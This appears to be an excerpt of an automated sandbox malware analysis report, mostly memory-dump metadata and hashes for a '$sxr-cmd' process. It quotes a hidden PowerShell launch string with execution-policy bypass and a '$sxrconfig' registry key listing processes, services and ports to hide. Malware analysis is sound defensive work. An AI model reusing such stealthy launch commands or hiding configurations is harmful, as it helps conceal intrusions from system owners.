                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                            • String ID: %9d
                                                                                                            • API String ID: 1006866328-2241623522
                                                                                                            • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                            • Instruction ID: aa2948adbfeb40610e9cb5db52b2e60cee2f58d593e3074706fadbffe14e1812
                                                                                                            • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                            • Instruction Fuzzy Hash: 1C516E71A08A42CAE780AB2198405A8BBA4FB48774F814635DA6E77791CF3DE55CCB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorFileLastWrite$ConsoleOutput
• String ID:
• API String ID: 1443284424-0
• Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
• Instruction ID: 23f871aea82567dfb7ca13ade0720894b883ca50303bfec973800a3930b10350
• Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
• Instruction Fuzzy Hash: 33E11272705AA0EAFB00CF64D0986DD7BB2F39578CF944156EE4A57B98DB38C51ACB00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 873b3c2c44ed97895201fd97bd1a747eda1d053ac7f6b8982f2d6aae6b07be06
• Instruction ID: c24720d01e7ccf001ebe1b7b98908ecb566fd520f4cb0e24b313a0522e1c3b57
• Opcode Fuzzy Hash: 873b3c2c44ed97895201fd97bd1a747eda1d053ac7f6b8982f2d6aae6b07be06
• Instruction Fuzzy Hash: 67C1F822A09F82C6EBA0EB10E4D0AB9A7A4FF59764F844231DA1D67790DF3CD55CC320
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: a78558bd1f81ee6e1dd7d50edf65511c41a2aa4325df58da4db0eec9b763d0d8
• Instruction ID: 1fe46a452bf949f0126b665b613a89618f3171e7fabf0ceee0930fa71a10a1e6
• Opcode Fuzzy Hash: a78558bd1f81ee6e1dd7d50edf65511c41a2aa4325df58da4db0eec9b763d0d8
• Instruction Fuzzy Hash: 53A1D422A18E5285EB90FB25A481679E6E4FF8DBA0F904135DD5E73790DE3DE41DC320
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$DiskFreeSpace
• String ID: %5lu
• API String ID: 2448137811-2100233843
• Opcode ID: 215e5527bcdf282b1a54cfe133cc73c2e3407b30518972e92e8a7a659d22b1ff
• Instruction ID: 8dfa88578c8f1087f45efd3ad742e541fd2f2c890e7c5870370f715ec2d258e3
• Opcode Fuzzy Hash: 215e5527bcdf282b1a54cfe133cc73c2e3407b30518972e92e8a7a659d22b1ff
• Instruction Fuzzy Hash: 2C419122708AC195EBA1EF51E8416EAB7A1FB88794F848131EE4D1BB48DF7DD14DC710
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsicmp
• String ID: GeToken: (%x) '%s'
• API String ID: 2081463915-1994581435
• Opcode ID: db21d3f5d7875ee4092bce65a18f63d4c03a4190767033ce4b9798d546bcb390
• Instruction ID: e0945f51c812de7221d01274eb9a9d5718088b23d88de5c00ac84a20a1b01bfe
• Opcode Fuzzy Hash: db21d3f5d7875ee4092bce65a18f63d4c03a4190767033ce4b9798d546bcb390
• Instruction Fuzzy Hash: FC719D20E08E4285FBE4BB69A484275A6A0AF18774FD40A35D51E73AA0DF7DE49DC330
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *?$HIJKLMNOPQRSTUVWXYZ
• API String ID: 3215553584-1407779936
• Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
• Instruction ID: ab99c7aa79d091f7bb2c9d29c1e7f1bb1a26066337a0ec5e19152db8652b8d28
• Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
• Instruction Fuzzy Hash: A551E373711F66E5EF14DFA29804ADD27A6F7A8BD8FA54521FE0907B85DB38C04A8300
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: OpenToken$CloseProcessThread
• String ID:
• API String ID: 2991381754-0
• Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
• Instruction ID: baf421741887cb602ab520eceffc477206fb03db39fda087e98276936b2352fd
• Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
• Instruction Fuzzy Hash: 5A21A232B08A529BE780AB50D48027DFBA4FB897B0F904135DB5963694DF7DD84CCB20
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: InformationQueryToken
• String ID:
• API String ID: 4239771691-0
• Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
• Instruction ID: 9473a494d003abaff5f5589c39545ba2781c531a5851b3be8745c0f42e19038e
• Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
• Instruction Fuzzy Hash: 6B11A573608B91DBEB519F01E4803A9FBA4FB887A5F444131DB48127A4DB7DD58CCB20
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: FileInformation$HandleQueryVolume
• String ID:
• API String ID: 2149833895-0
• Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
• Instruction ID: 90b43e30f45f67cfb0ccae18a785e7f4e8f65a99242cfa91585715d1a2d6b2af
• Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
• Instruction Fuzzy Hash: 53118631608BC1DAE7A0AB50F4403AEFBA4FB88B54F845235DA9D52A54DFBCD44CCB20
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationQueryToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4239771691-0
                                                                                                            • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                            • Instruction ID: 2a760b4f0b5d065fa4a35c2843fac78cf2c3ccca4ffc10a9fe846e25a46d5cb9
                                                                                                            • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                            • Instruction Fuzzy Hash: A5F030B3704B91CBD7009F64E58449CBB78F748B94795853ACB2803704DB75D9A8CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                            • String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                            • API String ID: 106492572-3028563969
                                                                                                            • Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction ID: ba5bd99f7436954d1d6ff976976e3d490d8374ee78defa82bd1923e24d38955d
                                                                                                            • Opcode Fuzzy Hash: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
                                                                                                            • Instruction Fuzzy Hash: 29713C36311E28E6EF509F22E858AD967B6F7E5B9DF801151FA4E53628EF38C548C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7137EF52A,00000000,00000000,?,00000000,?,00007FF7137EE626,?,?,00000000,00007FF7137F1F69), ref: 00007FF7137EF8DE
                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF8FB
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF951
                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EF96B
                                                                                                            • wcschr.MSVCRT ref: 00007FF7137EFA8E
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137EFB14
                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EFB2D
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137EFBEA
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137EF996
                                                                                                              • Part of subcall function 00007FF7137F0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71380849D,?,?,?,00007FF71380F0C7), ref: 00007FF7137F0045
                                                                                                              • Part of subcall function 00007FF7137F0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71380F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF7137F0071
                                                                                                              • Part of subcall function 00007FF7137F0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0092
                                                                                                              • Part of subcall function 00007FF7137F0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7137F00A7
                                                                                                              • Part of subcall function 00007FF7137F0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F0181
                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD401
                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD41B
                                                                                                            • longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD435
                                                                                                            • longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FD480
                                                                                                            Strings
                                                                                                            • =,;, xrefs: 00007FF7137EF8C8
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137EF90E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                            • String ID: =,;$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 3964947564-2862168527
                                                                                                            • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                            • Instruction ID: 4a343bee82522c99e49f2328e67e4583e70c7ed1bca9ff88c454049a943d521e
                                                                                                            • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                            • Instruction Fuzzy Hash: 02028E21A09E02CAEBD4BB21A884578E6A5FF49B74FD14235D91E77694DF3EA41CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$iswspacewcschr
                                                                                                            • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                            • API String ID: 840959033-3627297882
                                                                                                            • Opcode ID: 4657ea93f0aed74f3e4bb88c835e56408298cbf31f5b675b740e608a2e000999
                                                                                                            • Instruction ID: 282280849e571dcb5d3ed72e2623ded31a06d802f72c434b42fcb91420c7a3c2
                                                                                                            • Opcode Fuzzy Hash: 4657ea93f0aed74f3e4bb88c835e56408298cbf31f5b675b740e608a2e000999
                                                                                                            • Instruction Fuzzy Hash: 49D17C25A08E4386FBD0BB25A8852B9E6A8BF48B64FC44035D95E77395DE3DE41D8330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$EnvironmentVariable
                                                                                                            • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                            • API String ID: 198002717-267741548
                                                                                                            • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                            • Instruction ID: 8e97e3e1015b50505e1235df05fc216abeeaf261006c1c80d829bc98b0d074f0
                                                                                                            • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                            • Instruction Fuzzy Hash: 72513021A08E438AF790BB15A850279EB68FF4DBA0FC49035C95E63754EF6DE15C8770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigitiswspacewcschr
                                                                                                            • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                            • API String ID: 1595556998-2755026540
                                                                                                            • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                            • Instruction ID: 7fa8e22b90e0502bcc158a3f848836e504972de81ff53bd7f50a6d642401471f
                                                                                                            • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                            • Instruction Fuzzy Hash: 33228EA5E0CE5681FBE07B15A480279E6A0BF097B1FC24232D99D72AD4DF3CA45DD630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
